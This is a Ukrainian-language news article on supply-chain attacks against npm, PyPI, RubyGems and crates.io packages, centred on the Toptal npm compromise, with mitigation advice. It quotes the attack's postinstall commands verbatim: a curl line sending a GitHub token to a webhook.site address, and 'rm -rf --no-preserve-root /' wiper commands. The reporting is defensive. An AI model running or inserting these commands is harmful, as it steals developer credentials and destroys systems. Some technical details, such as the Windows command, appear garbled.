Зростання атак на ланцюги постачання у відкритому програмному забезпеченні

Головна — News — Зростання атак на ланцюги постачання у відкритому програмному забезпеченні

Націлювання на Джерело

Протягом останнього місяця зловмисники активізували свої зусилля щодо компрометації популярних відкритих пакетів, зламуючи облікові записи розробників, вставляючи шкідливі компоненти та публікуючи версії з бекдорами у загальнодоступних репозиторіях. Останній інцидент, виявлений компанією безпеки Socket, торкнувся десяти пакетів JavaScript, опублікованих під організацією Toptal на npm. Приблизно 5,000 проєктів завантажили заражені версії до їх видалення.

Related topic

Посібник з організації пошуку на основі штучного інтелекту Google

2025-07-24

Аналіз Векторів Атак

Початковий Злам та Крадіжка Токенів

Згідно з судово-медичною доповіддю Socket, зловмисники спочатку захопили GitHub Організацію Toptal. Використовуючи зламаний обліковий запис сервісу або фішинг для отримання доступу до користувача з високими привілеями, вони отримали доступ до збережених секретів NODE_AUTH_TOKEN та GITHUB_TOKEN у робочих процесах GitHub Actions. Потрапивши всередину, зловмисники змінили файли package.json, вставивши двоступеневий шкідливий postinstall скрипт.

Перша стадія витягувала токен автентифікації GitHub розробника та передавала його на контрольовану зловмисниками точку:

curl -d "$(gh auth token)" https://webhook.site/fb5b4647-aff8-418c-99e7-ec830cc2024b

Цей підхід, схожий на OIDC, використовував CLI GitHub (gh) для отримання епізодичного токена доступу, що надавало постійний контроль над репозиторієм і дозволяло подальшу компрометацію ланцюга постачання.

Руйнівний Компонент

Після крадіжки токенів друга стадія намагалася знищити файлову систему хосту:

sudo rm -rf --no-preserve-root / (Unix-подібні системи)
rm /s /q C: (еквівалент для Windows)

Параметр --no-preserve-root вимикає вбудовані засоби захисту, що робить це атакою-стирачем. У прес-релізах Toptal ще не розкрили, як були скомпрометовані дані, але експерти вказують на можливе неналежне зберігання секретів у CI або цілеспрямовану фішингову атаку.

Ширший Вплив на Екосистеми

У середині липня Socket також повідомив про три додаткові пакети — два на npm та один на PyPI, які містили шпигунське ПЗ. Ці компоненти дозволяли вести запис натискань клавіш, захоплювати екран, красти дані користувачів та отримувати доступ до веб-камери. До кінця липня ці чотири версії з бекдорами мали понад 56,000 завантажень.

Тим часом команди безпеки GitHub та PyPI повідомили про 40% збільшення інцидентів у ланцюгах постачання в порівнянні з минулим роком. Експертний аналіз свідчить, що, оскільки організації впроваджують DevSecOps та автоматизують оновлення залежностей, зловмисники використовують приховану довіру до джерел.

Related topic

Дослідження Pew: Вплив ШІ на трафік пошукових систем

2025-07-22

Останні Розробки

На початку серпня 2025 року дослідники Фонду безпеки відкритого програмного забезпечення (OpenSSF) розкрили два нові інциденти: шкідливий пакет RubyGems, націлений на Rails-додатки, та троянський crates.io пакет для розробників Rust. Обидва використали вкрадені токени CI для вставки бекдорів, підкреслюючи, що жодна екосистема не є імунною.

Стратегії Пом’якшення та Кращі Практики

Впроваджуйте GitHub MFA та змінюйте OIDC токени кожні 24–48 годин.

Використовуйте Sigstore для криптографічного підписування пакетів під час передачі.

Інтегруйте перевірки відповідності SLSA (Рівні ланцюга постачання для програмних артефактів) у CI/CD пайплайни.

Скануйте package.json скрипти життєвого циклу на наявність підозрілих команд перед установкою залежностей.

Слідкуйте за несподіваними наданнями дозволів репозиторію або областями токенів.

Related topic

Розширення для браузера, що перетворюють пристрої на проксі для веб-скрапінгу

2025-07-10

Думки Експертів

“Зловмисники переходять від простого ти́поску до компрометації легітимних облікових записів та CI/CD пайплайнів. Епізодичні, контекстно-специфічні токени в поєднанні з відтворюваними збірками є нашою найкращою обороною,” — говорить доктор Анжалі Рамеш, провідний дослідник OpenSSF.

Глибший Аналіз: Нові Заходи Захисту

Стандартизаційні органи просувають in-toto походження та журнали прозорості бінарних файлів, щоб забезпечити аудиторську перевірку кожного етапу збірки. Включаючи метадані про коміти джерела, середовища збірки та хеші артефактів, розробники можуть криптографічно перевіряти цілісність ланцюга постачання від початку до виробництва.

Related topic

Cloudflare закликає Google розділити AI та пошукові роботи

2025-07-09

Глибший Аналіз: Автоматизовані Техніки Виявлення

Платформи машинного навчання зараз профілюють нормальну поведінку postinstall та в реальному часі виявляють аномалії. Рішення, такі як GitHub Advanced Security та відкриті сканери (наприклад, Trivy, Dependabot), перехресно звіряють відомі сигнатури шкідливого програмного забезпечення та поведінкові евристики, щоб блокувати підозрілі релізи до того, як вони потраплять до розробників.

Висновок

Остання хвиля компрометацій ланцюга постачання на npm, PyPI, RubyGems та crates.io підкреслює критичну необхідність впровадження комплексних заходів безпеки. У міру розвитку DevSecOps інтеграція криптографічного походження, токенів CI з нульовою довірою та виявлення аномалій на основі штучного інтелекту стане ключовою для стримування автоматизованих, масштабних атак на екосистеми відкритого програмного забезпечення.